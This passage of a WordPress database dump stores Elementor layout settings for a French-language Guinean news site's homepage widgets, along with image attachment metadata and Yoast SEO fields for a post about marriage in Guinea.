\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"2\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"300\",\"twitter_widget_tweet_limit\":\"2\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3066,920,'_elementor_version','0.4'),(3067,920,'_elementor_css','a:3:{s:4:\"time\";i:1511252064;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3069,921,'_edit_last','1'),(3070,921,'_edit_lock','1511347318:1'),(3071,922,'_wp_attached_file','2017/11/kady-tounkara-1068x801-696x522.jpg'),(3072,922,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:696;s:6:\"height\";i:522;s:4:\"file\";s:42:\"2017/11/kady-tounkara-1068x801-696x522.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"kady-tounkara-1068x801-696x522-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"kady-tounkara-1068x801-696x522-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3073,921,'_thumbnail_id','922'),(3074,921,'_wp_page_template','default'),(3077,921,'_yoast_wpseo_focuskw_text_input','Mariage en Guinée'),(3078,921,'_yoast_wpseo_focuskw','Mariage en Guinée'),(3079,921,'_yoast_wpseo_linkdex','39'),(3080,921,'_yoast_wpseo_content_score','30'),(3081,921,'_yoast_wpseo_primary_category','1'),(3082,921,'post_views_count','202'),(3084,924,'_elementor_edit_mode','builder'),(3085,924,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\